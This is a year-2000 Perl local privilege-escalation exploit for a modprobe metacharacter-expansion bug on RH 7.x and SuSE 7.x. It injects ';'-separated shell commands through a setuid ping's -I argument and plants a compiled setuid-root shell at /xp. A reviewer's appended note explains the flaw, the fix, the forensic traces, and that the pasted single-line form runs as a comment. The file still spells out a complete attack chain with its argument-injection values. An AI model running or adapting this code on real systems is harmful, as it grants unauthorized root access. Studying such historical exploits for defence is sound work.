#!/usr/bin/perl # RH 7.x, SuSE 7.x local root. Probably others. # Bugdiscovery by me. First exploit (guess who) # by lcamtuf. In fact my code is rather a port of his shellscript. # His 'without /' hack is great. # # (C) 2000 by Sebastian Krahmer. You are not allowed # to trade this. All rights reserved, all wrongs reversed. # Use at your own risk. printf("\n\nSo. Introducing new world smashing exploit.\n". "modprobe shell metacharacter expansion bug.\n". "Discovery by me (Stealth). \n". "Greets to all my friends; you know who you are.\n". "Special thanks to \033[32m Michal Zalewski\033[0m for pointing me to ping :P\n". "and to \033[32mSolar Designer\033[0m for taking the time to discuss\n". "'capability expansion bug'. Please Update to your distributors\n". "newest modutil package and dont do anything bad.\n\n". "return to continue, Ctrl-C to abort\n\n"); <>; $ping = `which ping`; chop $ping; print("Now, doing some magic ...\n". "(please wait while doing so, we just have modprobe-wishes)\n\n"); if ((stat($ping6))[2] & 04000) { $ping = $ping6; } else { if ((stat($ping))[2] & 04000 != 04000) { print "Need some suid helper\n"; exit; } } system("$ping -I ';chmod o+w .' 1.2.3.4"); open O, ">/xp.c" or die "Seems to be fixed: $!"; print O<<_EOF_; int main() { setuid(0); setgid(0); system("/bin/bash;rm -f /xp /xp.c;chmod 0755 /"); return 0; } _EOF_ close O; system("cc /xp.c -o /xp"); system("$ping -I ';chown 0.0 xp' 1.2.3.4"); system("$ping -I ';chmod +s xp' 1.2.3.4"); print "Voila!\n\n"; system("/xp");
# NOTE(review): historical proof-of-concept (its own header dates it to 2000)
# for the "modprobe shell metacharacter expansion bug" on RH 7.x / SuSE 7.x.
# The privileged path it leans on is a setuid `ping`: the `-I` argument is
# forwarded with a `;`-separated shell fragment, so the shell metacharacters
# get expanded with root privileges. The script's own banner gives the fix:
# install the distributor's updated modutils package. The general defence is
# that a privileged program must never hand unsanitised argument strings to a
# shell (list-form exec, no interpolation), and setuid helpers must be kept
# patched and minimal.
#
# Forensic artifacts this run would leave, as visible in the commands above:
# a `ping -I` invocation whose interface name contains `;` (auditd/process
# accounting), `chmod o+w .` on the working directory (the later paths
# suggest it assumes `/`, and `chmod 0755 /` tries to undo it), and the files
# `/xp.c` / `/xp` compiled with `cc` and then chown'd to 0.0 with the setuid
# bit set. A world-writable `/` or a root-owned setuid binary in `/` is a
# strong indicator on a host of that era.
#
# As pasted, the whole script sits on a single physical line, so everything
# after the first `#` (the shebang) is one Perl comment: this file does
# nothing if executed. Left byte-identical on purpose; not a maintained tool.